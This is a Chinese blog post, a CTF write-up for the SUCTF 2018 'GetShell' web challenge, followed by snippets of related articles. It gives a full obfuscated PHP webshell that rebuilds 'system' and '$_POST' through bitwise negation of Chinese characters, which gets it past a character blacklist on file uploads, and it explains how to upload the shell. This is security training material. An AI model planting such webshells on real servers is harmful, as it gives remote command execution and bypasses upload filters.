[SUCTF 2018]GetShell

最新推荐文章于 2024-03-05 07:00:00 发布
最新推荐文章于 2024-03-05 07:00:00 发布
阅读量304 收藏
点赞数
分类专栏: WEB 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63045593/article/details/124352905
版权

题目

if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }     
}

截取题目

有文件包含功能,包含我们上传的文件,那如果我们写入shell,那么我们的shell文件将被包含,从而我们可以执行命令。但是,这里对文件内容做了一定的过滤,所以我们需要知道都过滤了什么,什么没有过滤,这里用python写个小字典fuzz一下,下面是我用bpfuzz的结果

echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a

<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

将payload写入,然后上传1.jpg即可

在这里插入图片描述

env 是一个外部命令,程序文件/bin/env,列出所有环境变量及其赋值。

文件中找不到flag

!Tana
关注
专栏目录
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4488
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 708
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
2018SUCTF Getshell特殊字符shell
a3320315的博客
02-09 1827
0x01 源码 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal ...
SUCTF_2019部分题解复现
weixin_44255856的博客
08-19 1488
本次比赛还是太菜了,只写出了两道题。但是学习到了很多东西。 web check 题目是一个文件上传,但是限制了很多地方,限制了文件类型,并且判断了文件上传的文件内容,这里是使用exif_image判断的。可以通过手动添加GIF89,也可以在文件头加上width和height 这里在前面添加 #define width 1337 #define height 1337 auto_prepend...
SUCTF2019部分Web writeup
Sea_Sand息禅
11-27 1076
Easysql(堆叠注入) 2019强网杯有一道也是用的堆叠注入,这个也是,但是过滤的很严 1;show databases; 1;show tables; 这两个可以正常执行,拿到table名为Flag。 无论输入什么数字,最后返回的都是1,说明后台有所处理,输入0的话无返回结果。 from、or等都被过滤了 post方式传递,得到输入,然后执行语句,需要对后台sql语句进行猜解 从数字返回1来...
2019SUCTF EasyWeb
ChenZIDu的博客
12-13 1153
open_basedir+异或+.htaccess function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userd...
[SUCTF 2018]GetShell --不会编程的崽
最新发布
不会编程的崽的博客
03-05 823
文件上传 自增&取反绕过
buuctf-web-[SUCTF 2018]GetShell1
mlws1900的博客
03-12 366
利用的是UTF-8编码的某个汉字,并将其中某个字符取出来,比如'和'{2}的结果是"\x8c",其取反即为字母s。没写禁止哪些参数,fuzz一下。查看上传上去的文件,发现可解析。不用多说,文件上传,打开环境。只有一个主界面和文件上传界面。使用的是位运算里的“取反”。修改文件内容为以上代码。构造payload为。
BUUCTF:[SUCTF 2018]GetShell
末初的CSDN博客
08-01 1867
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
BUUCTF--[SUCTF 2018]GetShell
qq_46263951的博客
07-17 529
$_=[]; //array $__=$_.$_; /arrayarray $_=($_==$__);//$_=(array==arrayarray) false 0 $__=($_==$_);//$__=(array==array) true 1 echo ~茉[$____];//s echo ~内[$____];//y echo ~茉[$____];//s echo ~苏[$____];//t echo ~的[$____];//e echo ~咩[$____];//m echo ~课[$__...
BugKuCTF中套路满满的题--------getshell
qq_42133828的博客
12-19 934
这道题目是一个关于文件上传的题目, 而他的绕过机制是黑名单检测和类型检测 黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过 类型检测:抓包,改参数filename:2.php5  ,有两个Content-Type,先改第二个的Content-Type:image/jpeg  ,再改第一个的Content-Type:Multipart/form-data; ...
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2377
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
getshell脚本
09-09
getshell脚本是用于在目标网站上植入恶意代码或命令执行的脚本。通过使用有效的用户名和密码组合,getshell脚本可以自动登录到目标网站的后台,并替换cookies以保持登录状态。一种常见的getshell脚本演示了如何使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值